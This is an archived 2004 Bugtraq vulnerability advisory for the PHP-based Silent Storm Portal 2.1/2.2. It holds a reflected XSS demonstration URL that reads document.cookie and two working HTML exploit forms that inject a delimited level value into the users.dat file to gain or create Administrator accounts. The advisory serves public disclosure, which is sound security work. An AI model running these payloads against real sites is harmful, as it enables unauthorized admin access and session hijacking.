lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040930115754.15459.qmail@www.securityfocus.com>
Date: 30 Sep 2004 11:57:54 -0000
From: R00tCr4ck <root@...erspy.org>
To: bugtraq@...urityfocus.com
Subject: Multiple Vulnerabilities in Silent Storm Portal




#####################################
# CHT Security Research-2004        #
# http://www.CyberSpy.Org           #
# Turkey                      	    #
#####################################

Software:
Silent Storm Portal

Web Site:
http://www.silent-storm.co.uk/ssp/

Affected Version(s):
2.1,2.2

Description:
Silent Storm Portal is a PHP based portal system.It requires PHP4 or above.no MySQL needed.

Multiple Vulnerabilities in Silent Storm Portal:

Cross-Site Scripting vulnerability : 

Silent Storm Portal is prone to cross-site scripting attacks. It is possible to construct a link containing arbitrary script code to a website running Silent Storm Portal . When a user browses the link, the script code will be executed on the user in the context of the site using the Portal.The impact of this issue is that the attacker is able to hijack a legitimate web user's session, by stealing cookie-based authentication credentials.

Demonstration:

http://www.victim.com/index.php?module=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E


Unauthorized Administrative Access Vulnerability :

Silent Storm Portal stores all account informations,usernames and passwords in the users.dat file.This file is a plaintext file stored in the db directory.There is a flaw in profile.php file which could allow normal members to gain escalated privileges.The issue occurs due to insufficient sanitization of user-supplied data that may allow escape character sequences to be injected into the users.dat file.Submitting an e-mail address with an evil level code via profile module will inject Administrator level value into the database file and will escalate the current level to Administrator privileges.

Demonstration:

Register a user account then login and run the exploit.html

---exploit.html----
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@...l.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---

That's All!
What Happened?
The 3rd line of exploit.html injected Administrator level "1" into the database file.
( 1: Administrator,2: is Normal User. )

examples from the database file:

before exploiting:

evilaccount<~>password<~>any@...l.com<~>2<~><~><~><~><~>
			              Level
				   Normal User
after exploiting:

evilaccount<~>password<~>any@...l.com<~>1<~><~>2<~><~><~><~><~><~><~>
			         Injected Level
				  Administrator

You'll get "Updated Your Profile Sucessfuly !" message after executing the exploit.html
That's All! logout and re-login with your username/password.
click to "Admin Panel" link. ( index.php?module=../../apanel )
Now you have full Administrator privileges.

Here is another code that creates an Administrator account directly on the victim's portal:

---exploit2.html----
<form method="post" action="http://www.victim.com/index.php?module=../../Home">
User:<input type="text" name="usr" size="10"><br>
Pass:<input type="password" name="pas" size="10"><br>
<input type=hidden name="ema" value="any@...l.com<~>1<~>"><br>
<input type="submit" name="reg" value="Create Admin!">
</form>
---/exploit2.html---

----------------------------
The original article can be found at: 
http://www.CyberSpy.Org
(Turkish Language)


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ